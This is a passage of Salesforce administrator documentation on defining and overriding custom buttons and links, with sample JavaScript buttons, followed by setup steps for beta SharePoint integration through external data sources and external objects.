• For custom objects, from Setup, click Create > Objects, select one of the custom objects in the list, then click New
from the Custom Buttons and Links related list..

Note:  Custom buttons aren’t available on the User object or custom home pages. Custom buttons and links are
available for activities under the individual setup links for tasks and events. However, you can override a button
that applies to both tasks and events from Setup by clicking Customize > Activities > Activity Buttons.
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2. Click New Button or Link. Alternatively, click Default Custom Links to add a predefined custom link.
3. Enter the button or link attributes.
4. To validate all Salesforce merge fields and functions, click Check Syntax.
5. Click Save when you are finished or click Quick Save to save and continue editing. This validates the URL you defined,

if you set Content Source to URL.

• To view the specified URL, click Preview.
• To quit without saving your content, click Cancel.

6. Optionally, to open a button or link using settings other than the user's default browser settings, click Window Open
Properties on the button or link’s detail page.

7. Edit the page layout for the appropriate tab or search layout to display the new button or link.

Custom links for users are automatically added to the Custom Links section of the user detail page. Detail page buttons
can be added to the Button section of a page layout only.

8. To view all references to the new button or link, click Where is this used? on its detail page.

Note:  A link URL can be up to 3000 bytes. When data is substituted for the tokens in the URL, the link may exceed
3000 bytes. Your browser may enforce additional limits for the maximum URL length.

See Also:
Custom Button Considerations
Useful Custom Buttons and Links

Custom Buttons and Links Fields

Custom buttons and links are available in: All Editions except Database.com

Visualforce pages and s-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

DescriptionAttribute Name

The text that displays on user pages for the custom button or link.Label

The unique name for the button or link used when referenced from a merge field.This name
can contain only underscores and alphanumeric characters, and must be unique in your

Name

organization. It must begin with a letter, not include spaces, not end with an underscore, and
not contain two consecutive underscores.

In a packaging context, a namespace prefix is a one to 15-character alphanumeric identifier that
distinguishes your package and its contents from packages of other developers on AppExchange.

Namespace Prefix

Namespace prefixes are case-insensitive. For example, ABC and abc are not recognized as
unique. Your namespace prefix must be globally unique across all Salesforce organizations. It
keeps your managed package under your control exclusively.
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DescriptionAttribute Name

Protected components can’t be linked to or referenced by components created in a subscriber
organization. A developer can delete a protected component in a future release without worrying

Protected Component

about failing installations. However, once a component is marked as unprotected and is released
globally, the developer can’t delete it.

The text that distinguishes the button or link from others. This text displays only to
administrators when setting up buttons and links.

Description

Determines where the button or link is available on page layouts.

Detail Page Link

Select this option to add the link to the Custom Links section of your page layouts.

Display Type

Detail Page Button

Select this option to add the custom button to a record’s detail page. You can add detail
page buttons to the Button section of a page layout.

List Button

Select this option to add the custom button to a list view, search result layout, or related
list. You can add list buttons to the Related List section of a page layout or the List View
and Search Result layouts.

For list buttons, Salesforce automatically selects Display Checkboxes (for
Multi-Record Selection) that includes a checkbox next to each record in the list,
allowing users to select the records they want applied to the action on the list button.
Deselect this option if your custom button does not require the user to select records such
as one that quickly navigates the user to another page.

Choose the outcome of clicking the button or link.

When applicable, some settings have default values. For example, if you choose Display in
new window, the default height of a new window is 600 pixels. See Editing Window Open
Properties.

Behavior

Choose whether to use a URL, s-control, JavaScript action, or Visualforce page as the content
of the button or link. To use an s-control, choose Custom S-Control and select the s-control

Content Source

from the drop-down list. To use a URL, select URL and enter the link in the text area box exactly
as it would appear in the address bar of a Web browser.

Starting in Spring ‘13, we check the correctness of URLs in custom links and custom buttons.
When you create or edit custom links or custom buttons that contain invalid URL markup such
as scripts, we block the links from rendering and instead show an error message on hover.
Reconfigure the URLs to be valid and well-formed. The URL can be a relative URL or an
absolute http://, https://, file://, ftp://, or mailto:// address. Invalid URLs in
custom links or custom buttons created before Spring ‘13 are not checked for correctness until
you edit them.

To execute JavaScript code when the button or link is activated, select OnClick JavaScript
and enter the code in the text area box. To use a Visualforce page, select Visualforce Page
and choose the page from the Content drop-down list.
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DescriptionAttribute Name

Note:

• Visualforce pages used as custom links on the home page can’t specify a controller.

• Visualforce pages used as custom buttons or links on detail pages must specify a
standard controller of the same object.

• Visualforce pages used as custom list buttons must use a standard list controller of
the same object.

Enter the content of the button or link for buttons and links of type URL or OnClick JavaScript.Content

• To insert a field, choose the field type from Select Field Type and choose a field from Insert
Field.

• To insert activity merge fields, select Event or Task from Select Field Type.

• To insert an operator, choose the appropriate operator icon from the Insert Operator
drop-down list.

• To insert a function, double-click its name in the list, or select it and click Insert Selected
Function. To filter the list of functions, choose a category from the Functions drop-down
list. Select a function and click Help on this function to view a description and examples
of formulas using that function.

Tip:  Internet standards require special encoding for URLs.Salesforce automatically
encodes the text from any merge field you insert into a link. Encode any additional text
in your link manually. For example, to generate the following URL:

http://www.google.com/search?q={!user.name} Steve Mark 50%

Use this content:

http://www.google.com/search?q={!user.name}+Steve+Mark+50%25

Salesforce automatically strips double quotes from URLs when the Content Source
is URL. If you need to use double quotes, encode them manually. For example, to
generate the URL
http://www.google.com/search?q="salesforce+foundation", use this
content:
http://www.google.com/search?q=%22salesforce+foundation%22.

Encoding setting that defaults to Unicode (UTF-8). Change the default encoding setting if the
target of a link requires data in a different format. This is available if your Content Source is
URL.

Link Encoding
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Editing Window Open Properties

Available in: All Editions except Database.com

S-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To edit custom button or link properties:

Custom buttons and links can open in different types of windows. If you have selected a custom button or link to open in a
popup window, set the window properties. If you leave the window properties blank, the custom button or link will use the
default settings of the user’s browser.

To edit the window open properties:

1. Select the custom button or link from Setup by clicking Customize, selecting the appropriate tab or users link, clicking
Buttons, Links, and Actions, and selecting the button or link name. Custom buttons are not available on the user object.

For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.

2. Click Window Open Properties.
3. Edit the following properties:

DescriptionWindow Property

The width (in pixels) of the popup.Width

The height (in pixels) of the popup.Height

The location on the screen where the popup should open.Window Position

Allow users to resize the popup window.Resizeable

Show the browser’s address bar which contains the URL.Show Address Bar

Show browser scrollbars for the popup.Show Scrollbars

Show the browser toolbars. Toolbars normally contain
navigation buttons like Back, Forward, and Print.

Show Toolbars

Show the browser menus. The menus typically contain
option like File and Edit.

Show Menu Bar

Show the status bar at the bottom of the browser.Show Status Bar
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Note:  Some properties may not be available depending on the behavior of the custom button or link. For example,
if you chose Execute JavaScript, no window open properties are available.

See Also:
Defining Custom Buttons and Links

Merge Fields for Custom Buttons and Links

Custom buttons and links are available in: All Editions except Database.com

Visualforce pages and s-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

A merge field is a field you can put in an email template, mail merge template, custom link, or formula to incorporate values
from a record.

Syntax and Formatting

When you insert a merge field in a custom button or link, the syntax consists of an open curly brace and exclamation point,
followed by the object name, a period, the field name and a closing curly brace.

{!Object_Name.Field_Name}

To ensure that you’re using the correct syntax, select merge fields from the drop-down list in the editor for custom buttons
and links.

Tips

• To insert activity merge fields, select Event or Task from the Select Field Type drop-down list.
• You can add links quickly to the sidebar by using the standard home page’s Custom Links component.

Warning:  The standard home page’s Custom Links component doesn’t support

◊ Merge fields
◊ Functions, such as URLFOR
◊ JavaScript execution
◊ Customizable window opening properties

See Also:
Merge Fields Overview
Custom Button Considerations
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Adding Default Custom Links

Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To create or change custom links:

1. From Setup, click Customize, select the appropriate tab link, and choose Buttons, Links, and Actions.
2. Click Default Custom Links.
3. Next to a sample link you want to add, click Add Now!.
4. Change the default data for the link, as necessary.
5. Choose Save.
6. Edit the page layout for the appropriate tab to display the new link.

See Also:
Defining Custom Buttons and Links

Custom Button Considerations
Custom buttons and links are available in: All Editions except Database.com

Visualforce pages and s-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

User Permissions Needed

“Customize Application”To create or change custom buttons or links:

• Custom buttons display at the top and bottom of the detail page to the right of all standard buttons.

• Custom buttons aren’t distinguished from standard buttons in any graphical way. However, you can recognize them by
their location on the right of all standard buttons.

• If the button bar gets too wide on the detail page layout, the browser displays a horizontal scroll bar. If the button bar gets
too wide on the list view, search result, tagging result, or related list layouts, the buttons wrap.

• Custom buttons are available for activities under the individual setup links for tasks and events. To add a custom button
to an activity list view or search layout, first create a custom list button in tasks or events. Next, add it to your activity list
view or search result layouts. You can override a button that applies to both tasks and events.

• Custom buttons aren’t available for Web-to-Lead, Web-to-Case, the Case Teams related list, or the user object.

• Person Account records use the custom buttons and links you have made for accounts.
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• If your organization uses the Console tab, list buttons are available in Mass Action. List buttons won’t display in the
mini page layouts. Pages that display due to custom buttons and links display in the console without the header or sidebar.

• If you get an error message when overriding a button that appears in a list, try calling the s-control using the URLFOR
function.

• When creating custom buttons, be aware of any validation rules your organization has for records on that object. For
example, a custom list button that changes case status may conflict with a case validation rule. In this scenario, Salesforce
displays the error message for the validation rule when users click the custom button.

• To replace a standard button with a custom button, first define the custom button, then customize the page layout to hide
the standard button and display the custom one in its place

• Use formula functions in custom buttons with caution. Because functions run on the server before your HTML or JavaScript
is passed to the browser, they can only evaluate information that exists at that time. Avoid using functions like IF to evaluate
conditions that only exist when the code reaches the browser, such as the value of a JavaScript variable that is returned
from your code.

• To prevent a user from performing a particular action, such as creating or editing, change the user's permissions rather
than hiding the standard button. Hiding a standard button removes it from a page layout but the link is still available and
users can navigate to the new or edit page manually.

• Use global variables to access special merge fields for components like custom buttons, links, and s-controls. For example,
the $Request global variable allows you to access query parameters inside a snippet, s-control, or custom button.

• Don’t select Display Checkboxes (for Multi-Record Selection) for list buttons that link to a URL that
doesn’t support post operations. Checkboxes display next to records in a list if you have selected Display Checkboxes
(for Multi-Record Selection) for at least one list button in that list. However, selected records in this list are
unaffected when clicking a custom list button that doesn’t have this option selected.

See Also:
Defining Custom Buttons and Links
Useful Custom Buttons and Links

Overriding Standard Buttons and Tab Home Pages
Available in: Enterprise, Unlimited, and Developer Editions

Visualforce overrides also available in: Contact Manager, Group, and Professional Editions

User Permissions Needed

“Customize Application”To override standard buttons and tab home pages:

“Customize Application”To reset button and tab home page overrides:

Salesforce lets you override the behavior of standard buttons on record detail pages. In addition, you can override the tab home
page that displays when a user clicks a standard or custom object tab.
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Important:  Before you override a standard button, review the considerations for overriding standard buttons.

1. Navigate to the appropriate override page.

• For standard objects, from Setup, click Customize, select the appropriate object or tab link, then click Buttons, Links,
and Actions.

• For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.

Click Edit next to the button or tab home page you want to override.

Note:  Since events and tasks don't have their own tabs, you can only override their standard buttons and links.

2. Pick the type of override you want associated with the action.

• No Override (use default)—Use a custom override provided by an installed package. If there isn't one installed, the
standard Salesforce behavior is used.

• Standard Salesforce Page—This option is available only for subscribers who are overriding the actions on an installed
custom object. If selected, the standard Salesforce behavior is used.

• Custom S-Control—Use the behavior from an s-control.

Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.

• Visualforce Page—Use the behavior from a Visualforce page.

3. Select the name of the s-control or Visualforce page you want to run when users click the button or tab.

When overriding buttons with a Visualforce page, only Visualforce pages that use the standard controller for the object
on which the button appears can be selected. For example, if you want to use a page to override the Edit button on accounts,
the page markup must include the standardController="Account" attribute on the <apex:page> tag:

<apex:page standardController="Account">

... page content here ...

</apex:page>

When overriding tabs with a Visualforce page, only Visualforce pages that use the standard list controller for that tab,
pages with a custom controller, or pages with no controller can be selected.

When overriding lists with a Visualforce page, only Visualforce pages that use a standard list controller can be selected.

When overriding the New button with a Visualforce page, you also have the option to skip the record type selection page.
If selected, any new records you create won't be forwarded to the record type selection page, since it assumes that your
Visualforce page is already handling record types.

4. Optionally, enter any comments to note the reason for making this change.
5. Click Save.

Button overrides are global throughout Salesforce because overrides control the action behind the button. For example, if
you override the New button on opportunities, your replacement action takes effect wherever that action is available.
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• The Opportunities home page.
• Any opportunities related lists on other objects such as accounts.
• The Create New drop-down list in the sidebar.
• Any browser bookmarks for this Salesforce page.

See Also:
Removing Overrides for Standard Buttons and Tab Home Pages

Considerations for Overriding Standard Buttons

Available in: Enterprise, Unlimited, and Developer Editions

Visualforce overrides also available in: Contact Manager, Group, and Professional Editions

User Permissions Needed

“Customize Application”To override standard buttons:

Before you override a standard button, review the following considerations:

• You can override a standard button with a Visualforce page.

• If you override a standard button in Salesforce, that button is still available in Connect Offline or Salesforce Classic, but
it retains its original behavior.

• You cannot add button overrides to a Force.com AppExchange package.

• Only some standard buttons can be overridden. For example, you cannot override the Save or Sharing buttons, but you
can override New, View, Edit, and Delete buttons.

• The View standard button refers to all of the links in Salesforce that display the detail page for a record. Overriding the
View standard button reroutes all of these links.

• If a button is not available for overrides, you can still hide it on the page layout.

• Button overrides affect everywhere that action or behavior is available. For example, overriding the New button on an
account also overrides the account option in the Create New drop-down list in the sidebar.

• You can override buttons on the detail page but not the edit page of a record.

• Buttons on lookup dialogs and tabs cannot be changed. However, you can change the buttons on list view and search result
layouts under search layouts.

• Buttons on reports cannot be changed.

• Some standard buttons can be overridden, but none can be relocated on the detail page or relabeled.

• If your organization uses person accounts, your person account records use any standard button overrides you have made
for accounts. Your person account records also use any overrides for the View Self-Service and Enable Self-Service buttons
you have made for contacts.

• If your organization uses the Console tab, overrides for the Edit and View buttons for an object do not affect the Edit and
View buttons in the mini page layouts. Pages that display due to overrides display in the console without the header or
sidebar.
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• To replace a standard button with a custom button, first define the custom button, then customize the page layout to hide
the standard button and display the custom one in its place

See Also:
Overriding Standard Buttons and Tab Home Pages

Removing Overrides for Standard Buttons and Tab Home Pages

Available in: Enterprise, Unlimited, and Developer Editions

Visualforce overrides also available in: Contact Manager, Group, and Professional Editions

User Permissions Needed

“Customize Application”To override standard buttons and tab home pages:

“Customize Application”To reset button and tab home page overrides:

1. Navigate to the appropriate override page.

• For standard objects, from Setup, click Customize, select the appropriate object or tab link, then click Buttons, Links,
and Actions.

• For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.

2. Click Edit next to the override.
3. Select No Override (default behavior).
4. Click OK.
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Viewing References to Salesforce Components
Custom buttons and links are available in: All Editions

Visualforce pages and custom components available in: Contact Manager, Group, Professional, Enterprise, Unlimited,
and Developer Editions

User Permissions Needed

“Customize Application”To create or change custom buttons or links:

“Customize Application”To create, edit, and delete Visualforce pages and custom
components:

“Customize Application”To clone, edit, or delete static resources:

You can view a list of all the areas in Salesforce that reference a component. For example, view the custom links, custom
buttons, or page layouts that reference another component, such as a Visualforce page or static resource. To do this, click
Where is this used? from the detail page of the component. Salesforce lists the type of component that references the component
and the label for that component. Click any item in the list to view it directly.

See Also:
Defining Custom Buttons and Links

Useful Custom Buttons and Links
User Permissions Needed

“Customize Application”To create or change custom buttons or links:

Custom buttons and links are available in: All Editions except Database.com

Visualforce pages and s-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

Use these samples to get started using custom buttons and links.

• Displaying Alerts

• Getting Record IDs

• Mass Delete

• Passing Record IDs to an External System

• Reopening Cases
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• International Maps

See Also:
Defining Custom Buttons and Links

Displaying Alerts

User Permissions Needed

“Customize Application”To create or change custom buttons or links:

Custom buttons and links are available in: All Editions except Database.com

Visualforce pages and s-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

This example creates a button that opens a popup dialog with a welcome message containing the user's first name.

1. Define a button with the following attributes.

• Display Type Detail Page Button
• Behavior Execute JavaScript
• Content Source OnClick JavaScript
• Use the following sample code.

alert ("Hello {!$User.FirstName}");

2. Add the button to the appropriate page layout.

See Also:
Useful Custom Buttons and Links
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Getting Record IDs

User Permissions Needed

“Customize Application”To create or change custom buttons or links:

Custom buttons and links are available in: All Editions except Database.com

Visualforce pages and s-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

This example creates a button that opens a popup window listing record IDs for user selected records. This is useful when
testing to ensure you have the correct record IDs before processing them further.

1. Define a button with the following attributes.

• Display Type List Button

Note:  Select Display Checkboxes (for Multi-Record Selection) so users can select multiple records in the
list before clicking the button.

• Behavior Execute JavaScript
• Content Source OnClick JavaScript
• Use the following sample code.

idArray = {!GETRECORDIDS($ObjectType.Contact)};
alert("The Ids you have selected are: "+idArray);

Note:  This example is for contacts. Change the object type for a different type of record.

2. Add the button to the appropriate related list on a page layout or list view layout.

See Also:
Useful Custom Buttons and Links
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Mass Delete

User Permissions Needed

“Customize Application”To create or change custom buttons or links:

Custom buttons and links are available in: All Editions except Database.com

Visualforce pages and s-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

This example creates a button that can be added to activity related lists and list views, and allows users to delete selected records
at the same time.

1. Define a button for events with the following attributes.

• Display Type List Button

Note:  Select Display Checkboxes (for Multi-Record Selection) so users can select multiple records in the
list before clicking the button.

• Behavior Execute JavaScript
• Content Source OnClick JavaScript
• Use the following sample code.

{!REQUIRESCRIPT("/soap/ajax/9.0/connection.js")}

var records = {!GETRECORDIDS( $ObjectType.Event )};
var taskRecords = {!GETRECORDIDS( $ObjectType.Task)};
records = records.concat(taskRecords);

if (records[0] == null) {
alert("Please select at least one record.") }
else {

var errors = [];
var result = sforce.connection.deleteIds(records);
if (result && result.length){
var numFailed = 0;
var numSucceeded = 0;
for (var i = 0; i < result.length; i++){
var res = result[i];
if (res && res.success == 'true'){
numSucceeded++;
} else {
var es = res.getArray("errors");
if (es.length > 0) {
errors.push(es[0].message);
}
numFailed++;
}
}
if (numFailed > 0){
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alert("Failed: " + numFailed + "\nSucceeded: " + numSucceeded + " \n Due to: " +
errors.join("\n"));
} else {
alert("Number of records deleted: " + numSucceeded);
}
}
window.location.reload();
}

2. Add the button to your activity list views.
3. Add the button to any page layout that contains an activity related list. The button deletes any selected task or event in

the list.

You can install custom buttons from the Mass Delete app at http://sites.force.com/appexchange.

See Also:
Useful Custom Buttons and Links

Passing Record IDs to an External System

User Permissions Needed

“Customize Application”To create or change custom buttons or links:

Custom buttons and links are available in: All Editions except Database.com

Visualforce pages and s-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

You can use Salesforce record IDs as unique identifiers for integrating with an external system. This example creates a button
that calls a Visualforce page to determine the record IDs of selected records and passes them in a URL query parameter to an
external Web page called “www.yourwebsitehere.com.”

1. Create a Visualforce page that uses the GETRECORDIDS function to retrieve a list of selected records:

<script type="text/javascript">

idArray = {!GETRECORDIDS($ObjectType.Account)};

window.location.href="http://www.yourwebsitehere.com?array="+idArray;

</script>

Note:  Replace www.yourwebsitehere.com with your own URL.

2. Define a button for accounts with the following attributes.
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• Display Type List Button

Note:  Select Display Checkboxes (for Multi-Record Selection) so users can select multiple records in the
list before clicking the button.

• Behavior Display in existing window with sidebar
• Content Source Visualforce Page
• Select the Visualforce page you created in the first step.

3. Add the button to the appropriate page layout or list view layout.

See Also:
Useful Custom Buttons and Links

Reopening Cases

User Permissions Needed

“Customize Application”To create or change custom buttons or links:

Custom buttons and links are available in: All Editions except Database.com

Visualforce pages and s-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

This example creates a button that can be added to cases related lists so users can reopen several cases on an opportunity at
once.

1. Define a button for cases with the following attributes.

• Display Type List Button

Note:  Select Display Checkboxes (for Multi-Record Selection) so users can select multiple records in the
list before clicking the button.

• Behavior Execute JavaScript
• Content Source OnClick JavaScript
• Use the following sample code.

{!REQUIRESCRIPT ("/soap/ajax/13.0/connection.js")} var records =
{!GETRECORDIDS($ObjectType.Sample)}; var newRecords = []; if

(records[0] == null) { alert("Please select at least one row") } else {
for (var n=0; n<records.length; n++) { var c = new

sforce.SObject("Case"); c.id = records[n]; c.Status = "New";
newRecords.push(c); } result = sforce.connection.update(newRecords);

window.location.reload(); }
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Note:  This example references the AJAX Toolkit, which is available if API access is enabled. See
https://wiki.developerforce.com/page/Integration.

2. Add the button to your opportunity page layouts by editing the Cases related list.

Tip:  Use this button on any page layout that contains the cases related list, such as account or contact page layouts.

Note:  Notice the check for records[0] == null, which displays a message to users when they don’t select at
least one record in the list.

See Also:
Useful Custom Buttons and Links

International Maps

User Permissions Needed

“Customize Application”To create or change custom buttons or links:

Custom buttons and links are available in: All Editions except Database.com

Visualforce pages and s-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

This example creates a link that displays a country-specific Google map.

1. Define a link for accounts with the following attributes.

• Display Type Detail Page Link
• Behavior Display in new window
• Content Source URL
• Use the following sample code.

{!
IF(Sample.BillingCountry = "US",
"http://maps.google.com/maps?q="&Sample.BillingStreet&
"+"&Sample.BillingCity&"+"&Sample.BillingState&"+"&Sample.BillingCountry,
(IF(Sample.BillingCountry = "UK",
"http://maps.google.co.uk/maps?q="&Sample.BillingStreet
&"+"&Sample.BillingCity&"+"&Sample.BillingCountry,
"http://maps.google.com")))
}
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2. Add the link to your account page layout.

See Also:
Useful Custom Buttons and Links

EXTERNAL DATA INTEGRATION

Integrating with SharePoint — Beta
Set up administrative options to access SharePoint data from Salesforce.

Available in: Enterprise, Unlimited, Developer Editions

Note: Sunlight Search, which lets you access SharePoint data in Salesforce via external objects, is currently available
as a beta feature. You can provide feedback and suggestions for Sunlight Search on the IdeaExchange. For information
on enabling this feature for your organization, contact salesforce.com.

Use external data sources together with external objects to search SharePoint 2007, SharePoint 2010, and SharePoint Online
data in Salesforce. (To include external data in searches, Chatter must be enabled for your organization.)

To ensure smooth data transfer, configure SharePoint and Salesforce as follows.

1. In SharePoint, edit scope properties and rules to ensure that they include the data you want to access in Salesforce:

• In SharePoint 2007 or 2010, navigate to Central Administration > Application Management, and click Manage
Service Applications. In the list of applications, click Search Service Application. Then, in the left column, click
Scopes.

• In SharePoint Online, navigate to Site Actions > Site Settings. Under Site Collection Administration, click Search
Scopes.

Tip:  Scope names map to the Table Name field in the external data source definition in Salesforce. If you’re
working with SharePoint Online P1 or P2, you must manually add a comma-delimited list of desired scopes to
the Default External Repository field in the external data source definition.

2. For most SharePoint 2007 or 2010 metadata properties, you can filter or sort corresponding fields of external objects in
Salesforce. To adjust this behavior, do the following:

• If you cannot filter or sort in Salesforce, in the left column of SharePoint, click Metadata Properties, then click the
property name, and select Reduce Storage Requirements for Text Properties by Using a Hash for Comparison.

• If filtering or sorting is disabled for a SharePoint property by design, select Filtering Disabled and Sorting Disabled
in the corresponding Custom Field Definition in Salesforce. Otherwise, errors may occur.

SharePoint Online offers more limited integration. When you validate and sync the external data source, Salesforce accesses
a default set of metadata properties, but the corresponding fields in external objects are not filterable or sortable.

3512

Integrating with SharePoint — BetaExternal Data Integration

https://success.salesforce.com/ideaView?id=08730000000BrHGAA0


Important:  If SharePoint returns multiple values for a field, that field is blank in Salesforce. To hide these fields,
delete them from the external object definition.

See Also:
Storing External Authentication Settings — Beta

Defining External Data Sources — Beta
Available in: Enterprise, Unlimited, Developer Editions

User Permissions Needed

“Customize Application”To create and edit external data sources:

Note: Sunlight Search, which lets you access SharePoint data in Salesforce via external objects, is currently available
as a beta feature. You can provide feedback and suggestions for Sunlight Search on the IdeaExchange. For information
on enabling this feature for your organization, contact salesforce.com.

Create external data sources to manage connection details for integration with data sources outside Salesforce, such as
SharePoint® or SharePoint® Online. External data source definitions enable access to data outside Salesforce via Sunlight
Search.

1. From Setup, click Develop > External Data Sources.
2. Click New External Data Source, or click Edit to modify an existing external data source.
3. Enter the following:

Note:  The extent to which you can customize data visibility for integration varies by data source. Consult the
documentation for the data source to determine the optimal settings for integration with Salesforce.

DescriptionField

A user-friendly name for the data source displayed in the
Salesforce user interface, such as in list views.

Examples include Acme Team Marketing Site, or Acme
SharePoint.

Label

A unique identifier used to refer to this external data source
definition through the API. The Name field can contain

Name

only underscores and alphanumeric characters. It must be
unique, begin with a letter, not include spaces, not end with
an underscore, and not contain two consecutive underscores.
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DescriptionField

The type of data source you want to connect to.

For Sunlight Search, select either SharePoint or SharePoint
Online.

Type

The server root URL of the data source. You must escape
any special characters in your URL.

Examples include

Server URL

• https://sharepoint.acme.com/sitecollections/marketing

• http://extranet.acme.com/Sharepoint/sites/sandbox

• https://docs.google.com/a/acme.com

• https://www.box.com/files#/files/0/f/0/All_Files

Some versions of SharePoint Online require an https
endpoint while others require http. For a fully secure
connection, try https first. If errors occur, try http, which
secures only authentication.

The identity type used to authenticate to the data source
outside Salesforce.

Identity Type

• Anonymous: Select when you don’t want to use any
credentials to authenticate Salesforce to the external
server.

• Per User: Select when you want to use separate
credentials for each user accessing the data source from
Salesforce. You must specify administrator credentials
in the external data source definition. This user should
be able to see all the metadata that you would like to sync
over to Salesforce. These credentials are not used when
performing searches or queries.

• Named Principal: Select when you want to use the same
set of credentials when any user accesses external data
from Salesforce.

The protocol required to access the data source outside
Salesforce. For SharePoint, select Basic Authentication.

Authentication Protocol

Available only for SharePoint 2010 and 2007. If a security
certificate is required, click the Certificate Lookup icon to
search across active certificates created in Salesforce.

Certificate

The username to be used by Salesforce to access the external
source. Ensure that the credentials you use have adequate

Username

privileges to be able to access the data source, perform
searches, and return information. Depending on how you
set up access, you may need to provide the administrator
username.

3514

Defining External Data Sources — BetaExtending the Reach of Your Organization



DescriptionField

The password to be used by Salesforce to access the external
source. Ensure that the credentials you use have adequate

Password

privileges to be able to access the data source, perform
searches, and return information about the external data.
Depending on how you set up access, you may need to
provide the administrator password.

4. Click Save.
5. To enable access to external data through Sunlight Search, click Validate and Sync. This validates the connection and

retrieves information about the tables in the data source. Select the tables you want to enable search access for in Salesforce
and click Sync.

Tip:  Clicking Sync automatically creates an external object for each selected table, mapping fields in Salesforce
to each table column.

When using the validate and sync method, bear in mind that:

• Syncing does not store any data in Salesforce; it only defines mappings to external tables or repositories that contain
the data. These mappings let Salesforce access and search the external data. Any modifications to the data must be
made outside Salesforce.

• If you re-sync a data source (for example, to map to a newly-created field), any field labels you’ve customized for related
external objects in Salesforce revert to default settings.

• SharePoint Online supports automatic syncing but allows only a fixed set of field-to-column mappings in each external
object definition. To extend search capabilities beyond these fixed field mappings for each object, you must edit the
external object definition and manually add custom fields that map to additional columns in the external table.

Note:  When you validate and sync a data source using Per User authentication, users can manage their external
authentication settings in Salesforce.

See Also:
Storing External Authentication Settings — Beta
Integrating with SharePoint — Beta
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Managing External Data Sources — Beta
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and edit external data sources:

Note: Sunlight Search, which lets you access SharePoint data in Salesforce via external objects, is currently available
as a beta feature. You can provide feedback and suggestions for Sunlight Search on the IdeaExchange. For information
on enabling this feature for your organization, contact salesforce.com.

Define external data sources to manage connections with data sources outside Salesforce, such as SharePoint®. An external
data source definition contains connection and authentication information to access external data. Once an external data source
is set up, its visible content is mapped to external object definitions to enable searching for SharePoint data in Salesforce.

To create new external data source definitions or edit, modify, and delete them, from Setup, click Develop > External Data
Sources.

• Click New External Data Source to define a new external data source.
• Click Edit to modify an existing external data source.
• Click Del to delete an existing external data source.
• Click the data source name in the Name or Label column to view or modify details about the data source.

See Also:
Storing External Authentication Settings — Beta
Integrating with SharePoint — Beta

Defining External Objects — Beta
Available in: Enterprise, Unlimited, Developer Editions

User Permissions Needed

“Customize Application”To create and edit external objects:

Note: Sunlight Search, which lets you access SharePoint data in Salesforce via external objects, is currently available
as a beta feature. You can provide feedback and suggestions for Sunlight Search on the IdeaExchange. For information
on enabling this feature for your organization, contact salesforce.com.

External objects are similar to custom objects, except they map to data located outside Salesforce. Each external object relies
on an external data source definition to connect with the data outside Salesforce. Each external object definition maps to a
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table that contains the data, and the object fields map to accessible table columns. The data in the external table can be searched
and referenced in Salesforce, via custom tabs and Sunlight Search.

Note:  If the data source allows for it, perform a sync on the external data source definition to automatically set up
external object definitions. If the source doesn’t allow you to perform a sync, you must manually define an external
object to represent each table along with field mappings for the table’s columns.

To create or modify an external object:

1. From Setup, click Develop > External Objects.
2. Click New External Object, or click Edit to modify an existing external object.
3. Enter the following:

DescriptionField

A name used to refer to the external object in any user
interface pages.

Label

The plural name of the external object. If you create a tab
for this object, this name is used for the tab.

Plural Label

If it is appropriate for your organization’s default language,
select to precede your label with "an" instead of "a" for any
automated messages.

Starts with vowel sound

A unique identifier used to refer to this external object
definition when using the API.

The Object Name field can contain only underscores and
alphanumeric characters. It must be unique, begin with a

Object Name

letter, not include spaces, not end with an underscore, and
not contain two consecutive underscores.

An optional description of the external object. A meaningful
description will help you remember the differences between
your external objects when you are viewing them in a list.

Description

Defines what displays when users click the Help for this
Page context sensitive help link from the external object

Context-Sensitive Help Setting

record home (overview), edit, and detail pages, as well as list
views and related lists. Choose Open the standard
Salesforce Help & Training window if you want to display
the basic Salesforce help available for any external object
record. Choose Open a window using a Visualforce
page to display the Visualforce page you select as the
context-sensitive help link from any external object record
page.

Note:  The Help & Training link at the top of any
page is not affected by this setting. It always opens
the Salesforce Help & Training window.
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DescriptionField

The external data source definition that contains the
connection details you want to use for this external object.

External Data Source

Table in the data source outside Salesforce that this object
should map to.

Table Name

Important:  For SharePoint, the table name must
match the related scope name.

Depending on the type of application Salesforce connects
to, an optional name of the repository in the source. Not
applicable to all data source types.

Repository Name

Indicates whether the external object is visible to other users.Deployment Status

Starts the custom tab wizard (include link) after you save
the external object.

Launch New Custom Tab Wizard after saving
this custom object

4. Click Save.
5. On the external object detail page, you view and modify various characteristics of the external object including custom

fields and relationships, page layouts, field sets, search layouts, and standard and custom buttons and links.

• To create new field mappings or add additional fields to an external object, click New on the Custom Fields &
Relationships related list.

• Click New on any related list to directly add an item.
• Click Edit next to any related list item to modify it.
• Where available, click Del next to any related list item to delete it.
• Click Page Layout Assignments to assign different page layouts by user profile.

See Also:
Defining External Data Sources — Beta

Managing External Objects — Beta
Include data from sources outside Salesforce by creating external data sources

Available in: Enterprise, Unlimited, Developer Editions

User Permissions Needed

“Customize Application”To create and edit external objects:
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Note: Sunlight Search, which lets you access SharePoint data in Salesforce via external objects, is currently available
as a beta feature. You can provide feedback and suggestions for Sunlight Search on the IdeaExchange. For information
on enabling this feature for your organization, contact salesforce.com.

Track and represent data from sources outside Salesforce by creating external objects. Each external object maps to a table in
